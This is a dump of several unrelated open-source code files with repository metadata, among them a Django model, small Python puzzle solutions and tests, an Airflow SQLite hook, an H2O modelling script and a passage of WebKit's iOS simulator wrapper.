multiple_commodities_flag = models.BooleanField(blank=False, null=False)
guidance_file_url = models.CharField(max_length=4000,
blank=True,
null=True)
licence_category_description = models.CharField(max_length=1000,
blank=True,
null=True)
usage_auto_category_desc_flag = models.BooleanField(blank=False,
null=False)
case_checklist_flag = models.BooleanField(blank=False, null=False)
importer_printable = models.BooleanField(blank=False, null=False)
origin_country_group = models.ForeignKey(
CountryGroup,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='import_application_types_from')
consignment_country_group = models.ForeignKey(
CountryGroup,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='import_application_types_to')
master_country_group = models.ForeignKey(
CountryGroup,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='import_application_types')
commodity_type = models.ForeignKey(CommodityType,
on_delete=models.PROTECT,
blank=True,
null=True)
declaration_template = models.ForeignKey(
Template,
on_delete=models.PROTECT,
blank=False,
null=False,
related_name='declaration_application_types')
endorsements = models.ManyToManyField(
Template, related_name='endorsement_application_types')
default_commodity_group = models.ForeignKey(CommodityGroup,
on_delete=models.PROTECT,
blank=True,
null=True)
def __str__(self):
if self.sub_type:
return f'{self.type} ({self.sub_type})'
else:
return f'{self.type}'
class Meta:
ordering = ('type', 'sub_type')
class ImportApplication(models.Model):
is_active = models.BooleanField(blank=False, null=False, default=True)
application_type = models.ForeignKey(ImportApplicationType,
on_delete=models.PROTECT,
blank=False,
null=False)
applicant_reference = models.CharField(max_length=500,
blank=True,
null=True)
submit_datetime = models.DateTimeField(blank=True, null=True)
create_datetime = models.DateTimeField(blank=False,
null=False,
auto_now_add=True)
case = models.OneToOneField(ImportCase,
on_delete=models.PROTECT,
related_name='application',
blank=True,
null=True)
submitted_by = models.ForeignKey(
User,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='submitted_import_applications')
created_by = models.ForeignKey(User,
on_delete=models.PROTECT,
blank=False,
null=False,
related_name='created_import_applications')
importer = models.ForeignKey(Importer,
on_delete=models.PROTECT,
blank=False,
null=False,
related_name='import_applications')
agent = models.ForeignKey(Importer,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='agent_import_applications')
importer_office = models.ForeignKey(
Office,
on_delete=models.PROTECT,
blank=False,
null=True,
related_name='office_import_applications')
agent_office = models.ForeignKey(
Office,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='agent_office_import_applications')
contact = models.ForeignKey(User,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='contact_import_applications')
origin_country = models.ForeignKey(Country,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='import_applications_from')
consignment_country = models.ForeignKey(
Country,
on_delete=models.PROTECT,
blank=True,
null=True,
related_name='import_applications_to')
| [
"b@androsaxon.co.uk"
] | b@androsaxon.co.uk |
e18a40f8cbff093d6c6e8d5e541bf41c3d67daa8 | ff4fe07752b61aa6404f85a8b4752e21e8a5bac8 | /challenge-209/spadacciniweb/python/ch-1.py | 88e7289f52bc8ddaa8483854bb105e9772513e22 | [] | no_license | choroba/perlweeklychallenge-club | 7c7127b3380664ca829158f2b6161c2f0153dfd9 | 2b2c6ec6ece04737ba9a572109d5e7072fdaa14a | refs/heads/master | 2023-08-10T08:11:40.142292 | 2023-08-06T20:44:13 | 2023-08-06T20:44:13 | 189,776,839 | 0 | 1 | null | 2019-06-01T20:56:32 | 2019-06-01T20:56:32 | null | UTF-8 | Python | false | false | 1,119 | py | # Task 1: Special Bit Characters
# Submitted by: Mohammad S Anwar
#
# You are given an array of binary bits that ends with 0.
#
# Valid sequences in the bit string are:
#
# [0] -decodes-to-> "a"
# [1, 0] -> "b"
# [1, 1] -> "c"
# Write a script to print 1 if the last character is an “a” otherwise print 0.
#
# Example 1
# Input: @bits = (1, 0, 0)
# Output: 1
#
# The given array bits can be decoded as 2-bits character (10) followed by 1-bit character (0).
#
# Example 2
# Input: @bits = (1, 1, 1, 0)
# Output: 0
#
# Possible decode can be 2-bits character (11) followed by 2-bits character (10) i.e. the last character is not 1-bit character.
import re
import sys
if __name__ == "__main__":
input = sys.argv[1:]
if (len(input) < 1
or
len(list(filter(lambda x: re.search(r'[^01]', x), input))) > 0):
sys.exit("Input error")
i = 0
while i < len(input)-1:
if (input[i] == '1'):
i += 1
i += 1
if len(input)-1 == i and input[i] == '1':
sys.exit("Input error")
if (len(input) > i):
print(1)
else:
print(0)
| [
"spadacciniweb@gmail.com"
] | spadacciniweb@gmail.com |
fcb2b9c1af9aa02b56bcb31befdd9f08992b561d | 430770c2da5c003d009b2196419180cb3680d07b | /test_code.py | 9d33f85eb34a990a395a9b46dfb6bb587613f8b9 | [
"MIT"
] | permissive | Nick-Bridges/ProcessEntropy | 99611f3a481d092eb53861ab7e62c75f216df54c | f1573d06d5ce5e4079af827712db401e8e3631e8 | refs/heads/master | 2022-12-29T11:47:46.063857 | 2020-10-01T06:14:31 | 2020-10-01T06:14:31 | 300,165,977 | 0 | 0 | MIT | 2020-10-01T06:08:22 | 2020-10-01T06:08:21 | null | UTF-8 | Python | false | false | 2,262 | py | # This is a temporary testing file until I get around to adding an actual testing package.
from ProcessEntropy.SelfEntropy import *
from ProcessEntropy.CrossEntropy import *
def test_self_entropy():
test_input = [1, 2, 3, 4, 5, 1, 2, 3, 3, 4, 5, 4, 4, 1, 2, 3]
test_output = [0, 1, 1, 1, 1, 4, 3, 2, 4, 3, 2, 2, 2, 4, 3, 2]
assert (self_entropy_rate(test_input, get_lambdas=True) == test_output).all()
print(self_entropy_rate(test_input))
def test_cross_entropy():
# Test find_lambda_jit
assert find_lambda_jit(np.array([5], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 2
assert find_lambda_jit(np.array([5,7], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 2
assert find_lambda_jit(np.array([5,3,2 ], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 3
assert find_lambda_jit(np.array([5,3, 5,5], dtype = int), np.array([1,2,3,4,5,3,2,4], dtype = int) ) == 3
assert find_lambda_jit(np.array([1,2,3], dtype = int), np.array([1], dtype = int)) == 2
assert find_lambda_jit(np.array([1,2,3], dtype = int), np.array([], dtype = int) ) == 1
# Test get_all_lambdas cross entropy
A = np.array([2,1,5,7,8,9,7,8,9,1,2,3,10,10,10], dtype = int)
B = np.array([1,2,3,4,5,6,7,8,9,1,2,3,4,3,2,1,5], dtype = int)
indices = np.array([0,0,3,3,9,9,12,12,12,12,12,14,14,14,14], dtype = int)
L = get_all_lambdas(A,B, indices, np.zeros(len(A)).astype(int))
assert np.mean(L == np.array([1., 1., 1., 1., 3., 2., 7., 6., 5., 4., 3., 2., 1., 1., 1.])) == 1
assert np.sum(L) == 39
# Test main function timeseries_cross_entropy
synth_data_A = [(0,[1,2,3]),(3,[1,2,3,4,5,6,7,6,5,6,5,6]), (5,[4,5,4,5,1,2,3,10,10])]
synth_data_B = [(2,[1,2,3,4,10,5,4,5,4]), (4,[10,10,6])]
assert np.mean(timeseries_cross_entropy(synth_data_A, synth_data_B, get_lambdas=True, please_sanitize= False) ==
np.array([1., 1., 1., 5., 4., 3., 3., 2., 1., 1., 1., 2., 1., 2., 1., 4., 4.,
3., 2., 4., 3., 2., 2., 2.])) == 1
def __main__():
test_self_entropy()
print("SelfEntropy working. (Should be 1.83)")
test_cross_entropy()
print("CrossEntropy working.")
print("""I don't have test cases from predictability yet.
But really, sometimes you have to live little dangerously.""")
__main__() | [
"tobin.south@gmail.com"
] | tobin.south@gmail.com |
d27b73807835afcd3d5ac7165b6fb8e9fd049a0c | 6fa6288bd21694bb144798d63b77a8e2924603e5 | /DataStructures/designs/desgin_tic_tac_toe.py | cda2095d7f338e82a64fc50c03ee2c3d3b6f7b1f | [] | no_license | akshatakulkarni98/ProblemSolving | 649ecd47cec0a29ccff60edb60f3456bf982c4a1 | 6765dbbde41cfc5ee799193bbbdfb1565eb6a5f5 | refs/heads/master | 2023-01-03T19:03:49.249794 | 2020-10-27T06:28:02 | 2020-10-27T06:28:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,391 | py | # https://leetcode.com/problems/design-tic-tac-toe/
# TC: O(1)
# SC: O(N)
class TicTacToe:
def __init__(self, n: int):
"""
Initialize your data structure here.
"""
self.rows=[0]*n
self.cols=[0]*n
self.prin_diag=0
self.sec_diag=0
self.n=n
def move(self, row: int, col: int, player: int) -> int:
"""
Player {player} makes a move at ({row}, {col}).
@param row The row of the board.
@param col The column of the board.
@param player The player, can be either 1 or 2.
@return The current winning condition, can be either:
0: No one wins.
1: Player 1 wins.
2: Player 2 wins.
"""
if player==1:
add=1
else:
add=-1
self.rows[row]+=add
self.cols[col]+=add
if row==col:
self.prin_diag+=add
if (row+col)==(self.n - 1):
self.sec_diag+=add
if (abs(self.rows[row]) == self.n or abs(self.cols[col]) == self.n
or abs(self.prin_diag) == self.n or abs(self.sec_diag) == self.n) :
return player
else:
return 0
# Your TicTacToe object will be instantiated and called as such:
# obj = TicTacToe(n)
# param_1 = obj.move(row,col,player)
| [
"noreply@github.com"
] | akshatakulkarni98.noreply@github.com |
8f178d02ad011b921b4130cb50f82470c3ed2dfa | 963625032645b4080c0c2606cc86391d0600e54c | /VCF-Converter.py | 5fd3d5bd33a0998b7b4cbc5c2fe1e352d353998a | [] | no_license | 3bdelrhmann/Save-Numbers-VCF | bb087257a227a607ecaca653c5411161f375e17c | 614f61fb082c8bdf34c2c6b204b7a325ae869347 | refs/heads/master | 2020-08-12T17:55:59.649210 | 2019-10-13T17:53:42 | 2019-10-13T17:53:42 | 214,814,638 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,087 | py | from random import randrange
FileName = input(str('What is your file name :?: '))
while '.' in FileName:
print("Please write file name without extention")
FileName = input(str('What is your file name :?: '))
def MainFunc(ListFileName):
try:
Mobile_List_File = open(ListFileName+".txt",'r')
except:
print("Please check your file name,exist,..etc cannot opened this file")
List_contents = Mobile_List_File.readline()
OutoputFileName = 'YourContants-' + str(randrange(92399)) + '.VCF'
with open(OutoputFileName,'w') as OutputFile:
counter = 0
while List_contents:
counter += 1
i = str(counter)
OutputFile.write('BEGIN:VCARD\n')
OutputFile.write('VERSION:3.0\n')
OutputFile.write('FN:'+ListFileName+'-'+i+'\n')
OutputFile.write('TEL:+2' + str(List_contents.strip())+'\n')
OutputFile.write('END:VCARD'+'\n')
List_contents = Mobile_List_File.readline()
OutputFile.close()
Mobile_List_File.close()
MainFunc(FileName)
| [
"abdelrhman_m@outlook.com"
] | abdelrhman_m@outlook.com |
59aec718fce53f6051be2ea2d5f6ec1380b3bfd2 | c7027edceeae907ce7d21112336e84f101eeb89b | /airflow/providers/sqlite/hooks/sqlite.py | 5a14249ca5902174edf5d6b29c533545cbd950d7 | [
"Apache-2.0",
"BSD-3-Clause",
"MIT"
] | permissive | jao6693/airflow | 0a8027ce33e20ee8f6032facb1b8ab453c2d20d4 | 269b608246b015c55e6cae4ed0f50b1e2bb0fa95 | refs/heads/main | 2023-01-30T18:53:23.431745 | 2022-11-05T14:59:27 | 2022-11-05T14:59:27 | 320,338,180 | 0 | 0 | Apache-2.0 | 2020-12-10T17:08:36 | 2020-12-10T17:08:35 | null | UTF-8 | Python | false | false | 1,618 | py | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import sqlite3
from airflow.providers.common.sql.hooks.sql import DbApiHook
class SqliteHook(DbApiHook):
"""Interact with SQLite."""
conn_name_attr = 'sqlite_conn_id'
default_conn_name = 'sqlite_default'
conn_type = 'sqlite'
hook_name = 'Sqlite'
placeholder = '?'
def get_conn(self) -> sqlite3.dbapi2.Connection:
"""Returns a sqlite connection object"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
conn = sqlite3.connect(airflow_conn.host)
return conn
def get_uri(self) -> str:
"""Override DbApiHook get_uri method for get_sqlalchemy_engine()"""
conn_id = getattr(self, self.conn_name_attr)
airflow_conn = self.get_connection(conn_id)
return f"sqlite:///{airflow_conn.host}"
| [
"fabien.beuret@delaware.pro"
] | fabien.beuret@delaware.pro |
c643c289d6a7b2f99414e9f9a7bb4a558e5ac8c3 | d79f3a31d173f18ec112c521acdcee8e8e73724d | /test5.py | 7cd08b85a12191df9c24b5d26bcedcd5412f72de | [] | no_license | k156/hello | 3de815de569b38f8260e774e57b138f4da43f480 | f5a7f386d3f78d15d7f166a95ad25724e168f472 | refs/heads/master | 2020-04-04T23:15:38.252126 | 2019-05-03T05:57:00 | 2019-05-03T05:57:00 | 156,352,395 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 589 | py | from bs4 import BeautifulSoup
import requests
from time import sleep
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36"
}
url = "https://www.melon.com/chart/index.htm#params%5Bidx%5D=1/"
html = requests.get(url, headers = headers).text
soup = BeautifulSoup(html, 'html.parser')
trs = soup.select("tr#lst50")
for tr in trs:
tds = tr.select('td')
rank = tds[1].text
title = tds[4]
# singer =
# print(rank, title, type(title))
print(rank, title, type(title)) | [
"jm_91@live.co.kr"
] | jm_91@live.co.kr |
669262236461f63becc76d8b5f7e36e0ea7b5338 | 5166b9a3d04a74d664007315782a257bbec8226e | /test.py | 332337fdd2c92281d14b52d721e513e96581afe7 | [] | no_license | SergiuDeveloper/Lexical-Complexity---V3 | 23423291da74456525db0aa70b35f5f875f8a4ae | 86c02faf63bc5a8521bacce399b9ae75c737c95c | refs/heads/main | 2023-04-08T05:53:57.944274 | 2021-04-21T15:45:55 | 2021-04-21T15:45:55 | 357,539,295 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 370 | py | from gensim.models.fasttext import FastText
from joblib import load
import sys
fasttext_mdl = FastText.load('models/FastText/model')
hgbr_mdl = load('models/HistGradientBoostingRegressor/model')
input_word = sys.argv[1].lower()
input_word_ngrams = fasttext_mdl.wv[input_word]
predicted_complexity = hgbr_mdl.predict([input_word_ngrams])[0]
print(predicted_complexity) | [
"sergiu.nistor@info.uaic.ro"
] | sergiu.nistor@info.uaic.ro |
b224e3cebfd3bb2602c4d7a2d4917aa1c84cf623 | d616dc1ef6fe075f15f2d83d8680dded8fecd35e | /example.py | 0f53a2dbd0bb07330f675f304753f0111bd31b28 | [
"Apache-2.0"
] | permissive | hellcoderz/pytrie | adb136aa1414c82d9a944e7a35d57c5060d0bf5e | 1cfc167c5201d855763714bd9f88e312e56402bd | refs/heads/master | 2020-04-01T23:03:49.833436 | 2014-02-03T11:07:34 | 2014-02-03T17:44:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,222 | py | #!/usr/bin/python
"""trie module example code."""
__author__ = 'Michal Nazarewicz <mina86@mina86.com>'
__copyright__ = 'Copyright 2014 Google Inc.'
import os
import stat
import sys
import trie
print 'Storing file information in the trie'
print '===================================='
print
ROOT_DIR = '/usr/local'
SUB_DIR = os.path.join(ROOT_DIR, 'lib')
SUB_DIRS = tuple(os.path.join(ROOT_DIR, d)
for d in ('lib', 'lib32', 'lib64', 'share'))
t = trie.StringTrie(separator=os.path.sep)
# Read sizes regular files into a Trie
for dirpath, unused_dirnames, filenames in os.walk(ROOT_DIR):
for filename in filenames:
filename = os.path.join(dirpath, filename)
try:
filestat = os.stat(filename)
except OSError:
continue
if stat.S_IFMT(filestat.st_mode) == stat.S_IFREG:
t[filename] = filestat.st_size
# Size of all files we've scanned
print 'Size of %s: %d' % (ROOT_DIR, sum(t.itervalues()))
# Size of all files of a sub-directory
print 'Size of %s: %d' % (SUB_DIR, sum(t.itervalues(prefix=SUB_DIR)))
# Check existence of some directories
for directory in SUB_DIRS:
print directory, 'exists' if t.has_subtrie(directory) else 'does not exist'
# Drop a subtrie
print 'Dropping', SUB_DIR
del t[SUB_DIR:]
print 'Size of %s: %d' % (ROOT_DIR, sum(t.itervalues()))
for directory in SUB_DIRS:
print directory, 'exists' if t.has_subtrie(directory) else 'does not exist'
print
print 'Storing URL handlers map'
print '========================'
print
t = trie.CharTrie()
t['/'] = lambda url: sys.stdout.write('Root handler: %s\n' % url)
t['/foo'] = lambda url: sys.stdout.write('Foo handler: %s\n' % url)
t['/foobar'] = lambda url: sys.stdout.write('FooBar handler: %s\n' % url)
t['/baz'] = lambda url: sys.stdout.write('Baz handler: %s\n' % url)
for url in ('/', '/foo', '/foot', '/foobar', 'invalid', '/foobarbaz', '/ba'):
handler = t.FindLongestPrefix(url)
if handler:
handler.value(url)
else:
print 'Unable to handle', repr(url)
if not os.isatty(0):
sys.exit(0)
try:
import termios
import tty
def getch():
attr = termios.tcgetattr(0)
try:
tty.setraw(0)
return sys.stdin.read(1)
finally:
termios.tcsetattr(0, termios.TCSADRAIN, attr)
except ImportError:
try:
from msvcrt import getch
except ImportError:
sys.exit(0)
print
print 'Dictionary test'
print '==============='
print
t = trie.CharTrie()
t['cat'] = True
t['caterpillar'] = True
t['car'] = True
t['bar'] = True
t['exit'] = False
print 'Start typing a word, "exit" to stop'
print '(Other words you might want to try: %s)' % ', '.join(sorted(
k for k in t if k != 'exit'))
print
text = ''
while True:
ch = getch()
if ord(ch) < 32:
print 'Exiting'
break
text += ch
value = t.get(text)
if value is False:
print 'Exiting'
break
if value is not None:
print repr(text), 'is a word'
if t.has_subtrie(text):
print repr(text), 'is a prefix of a word'
else:
print repr(text), 'is not a prefix, going back to empty string'
text = ''
| [
"mina86@mina86.com"
] | mina86@mina86.com |
0fdb15d008b4ea1de32bbfa7b86fb81240226cb8 | c96c77b9943fe884c63ea14b8dae233b6d4c5369 | /h2o-algos/src/test/java/hex/example/workflowtest.py | 75db4e4935720a83986f49c93b2f71db8af0026c | [
"Apache-2.0"
] | permissive | ChiahungTai/h2o-dev | c23b154b3ad54ccdd8eed652005a798c2fd89aec | f9f33ac3ba96e1b157caa7136286b749de3ba9d9 | refs/heads/master | 2021-01-18T07:48:35.665781 | 2015-02-07T01:19:08 | 2015-02-07T01:49:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,078 | py | import h2o
# Connect to a cluster
h2o.init()
# Pick either the big or the small demo.
# Big data is 10M rows
small_test = ["bigdata/laptop/citibike-nyc/2013-10.csv"]
big_test = ["bigdata/laptop/citibike-nyc/2013-07.csv",
"bigdata/laptop/citibike-nyc/2013-08.csv",
"bigdata/laptop/citibike-nyc/2013-09.csv",
"bigdata/laptop/citibike-nyc/2013-10.csv",
"bigdata/laptop/citibike-nyc/2013-11.csv",
"bigdata/laptop/citibike-nyc/2013-12.csv",
"bigdata/laptop/citibike-nyc/2014-01.csv",
"bigdata/laptop/citibike-nyc/2014-02.csv",
"bigdata/laptop/citibike-nyc/2014-03.csv",
"bigdata/laptop/citibike-nyc/2014-04.csv",
"bigdata/laptop/citibike-nyc/2014-05.csv",
"bigdata/laptop/citibike-nyc/2014-06.csv",
"bigdata/laptop/citibike-nyc/2014-07.csv",
"bigdata/laptop/citibike-nyc/2014-08.csv"]
# ----------
# 1- Load data
data = h2o.import_frame(path=big_test)
# ----------
# 2- light data munging
# Convert start time to: Day since the Epoch
startime = data["starttime"]
secsPerDay=1000*60*60*24
data["Days"] = (startime/secsPerDay).floor()
data.describe()
# Now do a monster Group-By. Count bike starts per-station per-day
ddplycols=["Days","start station name"]
bph = h2o.ddply(data[ddplycols],ddplycols,"(%nrow)")
bph["C1"]._name = "bikes"
bph["bikes"].quantile().show()
# A little feature engineering
# Add in month-of-year (seasonality; fewer bike rides in winter than summer)
secs = bph["Days"]*secsPerDay
bph["Month"] = secs.month()
# Add in day-of-week (work-week; more bike rides on Sunday than Monday)
bph["DayOfWeek"] = secs.dayOfWeek()
bph.describe()
# Test/train split
r = bph['Days'].runif()
train = bph[ r < 0.6 ]
test = bph[(0.6 <= r) & (r < 0.9)]
hold = bph[ 0.9 <= r ]
train.describe()
test .describe()
# ----------
# 3- build model on train; using test as validation
# Run GBM
gbm = h2o.gbm(x =train.drop("bikes"),
y =train ["bikes"],
validation_x=test .drop("bikes"),
validation_y=test ["bikes"],
ntrees=500, # 500 works well
max_depth=6,
min_rows=10,
nbins=20,
learn_rate=0.1)
#gbm.show()
# Run GLM
glm = h2o.glm(x =train.drop("bikes"),
y =train ["bikes"],
validation_x=test .drop("bikes"),
validation_y=test ["bikes"])
#glm.show()
# ----------
# 4- Score on holdout set & report
train_r2_gbm = gbm.model_performance(train).r2()
test_r2_gbm = gbm.model_performance(test ).r2()
hold_r2_gbm = gbm.model_performance(hold ).r2()
print "GBM R2 TRAIN=",train_r2_gbm,", R2 TEST=",test_r2_gbm,", R2 HOLDOUT=",hold_r2_gbm
train_r2_glm = glm.model_performance(train).r2()
test_r2_glm = glm.model_performance(test ).r2()
hold_r2_glm = glm.model_performance(hold ).r2()
print "GLM R2 TRAIN=",train_r2_glm,", R2 TEST=",test_r2_glm,", R2 HOLDOUT=",hold_r2_glm
| [
"cliffc@acm.org"
] | cliffc@acm.org |
8ee9c7efec2c921b88454de864a1af7b8fe6d6d5 | c831d5b1de47a062e1e25f3eb3087404b7680588 | /webkit/Tools/Scripts/webkitpy/xcode/simulator.py | 8af9add23fcd564619efa3a85604a9706e310311 | [] | no_license | naver/sling | 705b09c6bba6a5322e6478c8dc58bfdb0bfb560e | 5671cd445a2caae0b4dd0332299e4cfede05062c | refs/heads/master | 2023-08-24T15:50:41.690027 | 2016-12-20T17:19:13 | 2016-12-20T17:27:47 | 75,152,972 | 126 | 6 | null | 2022-10-31T00:25:34 | 2016-11-30T04:59:07 | C++ | UTF-8 | Python | false | false | 21,174 | py | # Copyright (C) 2014, 2015 Apple Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
# 1. Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY APPLE INC. AND ITS CONTRIBUTORS ``AS IS'' AND ANY
# EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL APPLE INC. OR ITS CONTRIBUTORS BE LIABLE FOR ANY
# DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON
# ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import itertools
import logging
import os
import plistlib
import re
import subprocess
import time
from webkitpy.benchmark_runner.utils import timeout
from webkitpy.common.host import Host
_log = logging.getLogger(__name__)
"""
Minimally wraps CoreSimulator functionality through simctl.
If possible, use real CoreSimulator.framework functionality by linking to the framework itself.
Do not use PyObjC to dlopen the framework.
"""
class DeviceType(object):
"""
Represents a CoreSimulator device type.
"""
def __init__(self, name, identifier):
"""
:param name: The device type's human-readable name
:type name: str
:param identifier: The CoreSimulator identifier.
:type identifier: str
"""
self.name = name
self.identifier = identifier
@classmethod
def from_name(cls, name):
"""
:param name: The name for the desired device type.
:type name: str
:returns: A `DeviceType` object with the specified identifier or throws a TypeError if it doesn't exist.
:rtype: DeviceType
"""
identifier = None
for device_type in Simulator().device_types:
if device_type.name == name:
identifier = device_type.identifier
break
if identifier is None:
raise TypeError('A device type with name "{name}" does not exist.'.format(name=name))
return DeviceType(name, identifier)
@classmethod
def from_identifier(cls, identifier):
"""
:param identifier: The CoreSimulator identifier for the desired runtime.
:type identifier: str
:returns: A `Runtime` object witht the specified identifier or throws a TypeError if it doesn't exist.
:rtype: DeviceType
"""
name = None
for device_type in Simulator().device_types:
if device_type.identifier == identifier:
name = device_type.name
break
if name is None:
raise TypeError('A device type with identifier "{identifier}" does not exist.'.format(
identifier=identifier))
return DeviceType(name, identifier)
def __eq__(self, other):
return (self.name == other.name) and (self.identifier == other.identifier)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '<DeviceType "{name}": {identifier}>'.format(name=self.name, identifier=self.identifier)
class Runtime(object):
"""
Represents a CoreSimulator runtime associated with an iOS SDK.
"""
def __init__(self, version, identifier, available, devices=None, is_internal_runtime=False):
"""
:param version: The iOS SDK version
:type version: tuple
:param identifier: The CoreSimulator runtime identifier
:type identifier: str
:param availability: Whether the runtime is available for use.
:type availability: bool
:param devices: A list of devices under this runtime
:type devices: list or None
:param is_internal_runtime: Whether the runtime is an Apple internal runtime
:type is_internal_runtime: bool
"""
self.version = version
self.identifier = identifier
self.available = available
self.devices = devices or []
self.is_internal_runtime = is_internal_runtime
@classmethod
def from_version_string(cls, version):
return cls.from_identifier('com.apple.CoreSimulator.SimRuntime.iOS-' + version.replace('.', '-'))
@classmethod
def from_identifier(cls, identifier):
"""
:param identifier: The identifier for the desired CoreSimulator runtime.
:type identifier: str
:returns: A `Runtime` object with the specified identifier or throws a TypeError if it doesn't exist.
:rtype: Runtime
"""
for runtime in Simulator().runtimes:
if runtime.identifier == identifier:
return runtime
raise TypeError('A runtime with identifier "{identifier}" does not exist.'.format(identifier=identifier))
def __eq__(self, other):
return (self.version == other.version) and (self.identifier == other.identifier) and (self.is_internal_runtime == other.is_internal_runtime)
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
version_suffix = ""
if self.is_internal_runtime:
version_suffix = " Internal"
return '<Runtime {version}: {identifier}. Available: {available}, {num_devices} devices>'.format(
version='.'.join(map(str, self.version)) + version_suffix,
identifier=self.identifier,
available=self.available,
num_devices=len(self.devices))
class Device(object):
"""
Represents a CoreSimulator device underneath a runtime
"""
def __init__(self, name, udid, available, runtime):
"""
:param name: The device name
:type name: str
:param udid: The device UDID (a UUID string)
:type udid: str
:param available: Whether the device is available for use.
:type available: bool
:param runtime: The iOS Simulator runtime that hosts this device
:type runtime: Runtime
"""
self.name = name
self.udid = udid
self.available = available
self.runtime = runtime
@property
def state(self):
"""
:returns: The current state of the device.
:rtype: Simulator.DeviceState
"""
return Simulator.device_state(self.udid)
@property
def path(self):
"""
:returns: The filesystem path that contains the simulator device's data.
:rtype: str
"""
return Simulator.device_directory(self.udid)
@classmethod
def create(cls, name, device_type, runtime):
"""
Create a new CoreSimulator device.
:param name: The name of the device.
:type name: str
:param device_type: The CoreSimulatort device type.
:type device_type: DeviceType
:param runtime: The CoreSimualtor runtime.
:type runtime: Runtime
:return: The new device or raises a CalledProcessError if ``simctl create`` failed.
:rtype: Device
"""
device_udid = subprocess.check_output(['xcrun', 'simctl', 'create', name, device_type.identifier, runtime.identifier]).rstrip()
Simulator.wait_until_device_is_in_state(device_udid, Simulator.DeviceState.SHUTDOWN)
return Simulator().find_device_by_udid(device_udid)
@classmethod
def delete(cls, udid):
"""
Delete the given CoreSimulator device.
:param udid: The udid of the device.
:type udid: str
"""
subprocess.call(['xcrun', 'simctl', 'delete', udid])
def __eq__(self, other):
return self.udid == other.udid
def __ne__(self, other):
return not self.__eq__(other)
def __repr__(self):
return '<Device "{name}": {udid}. State: {state}. Runtime: {runtime}, Available: {available}>'.format(
name=self.name,
udid=self.udid,
state=self.state,
available=self.available,
runtime=self.runtime.identifier)
# FIXME: This class is fragile because it parses the output of the simctl command line utility, which may change.
# We should find a better way to query for simulator device state and capabilities. Maybe take a similiar
# approach as in webkitdirs.pm and utilize the parsed output from the device.plist files in the sub-
# directories of ~/Library/Developer/CoreSimulator/Devices?
# Also, simctl has the option to output in JSON format (xcrun simctl list --json).
class Simulator(object):
"""
Represents the iOS Simulator infrastructure under the currently select Xcode.app bundle.
"""
device_type_re = re.compile('(?P<name>[^(]+)\((?P<identifier>[^)]+)\)')
# FIXME: runtime_re parses the version from the runtime name, but that does not contain the full version number
# (it can omit the revision). We should instead parse the version from the number contained in parentheses.
runtime_re = re.compile(
'(i|watch|tv)OS (?P<version>\d+\.\d)(?P<internal> Internal)? \(\d+\.\d+(\.\d+)? - (?P<build_version>[^)]+)\) \((?P<identifier>[^)]+)\)( \((?P<availability>[^)]+)\))?')
unavailable_version_re = re.compile('-- Unavailable: (?P<identifier>[^ ]+) --')
version_re = re.compile('-- (i|watch|tv)OS (?P<version>\d+\.\d+)(?P<internal> Internal)? --')
devices_re = re.compile(
'\s*(?P<name>[^(]+ )\((?P<udid>[^)]+)\) \((?P<state>[^)]+)\)( \((?P<availability>[^)]+)\))?')
def __init__(self, host=None):
self._host = host or Host()
self.runtimes = []
self.device_types = []
self.refresh()
# Keep these constants synchronized with the SimDeviceState constants in CoreSimulator/SimDevice.h.
class DeviceState:
DOES_NOT_EXIST = -1
CREATING = 0
SHUTDOWN = 1
BOOTING = 2
BOOTED = 3
SHUTTING_DOWN = 4
@staticmethod
def wait_until_device_is_booted(udid, timeout_seconds=60 * 5):
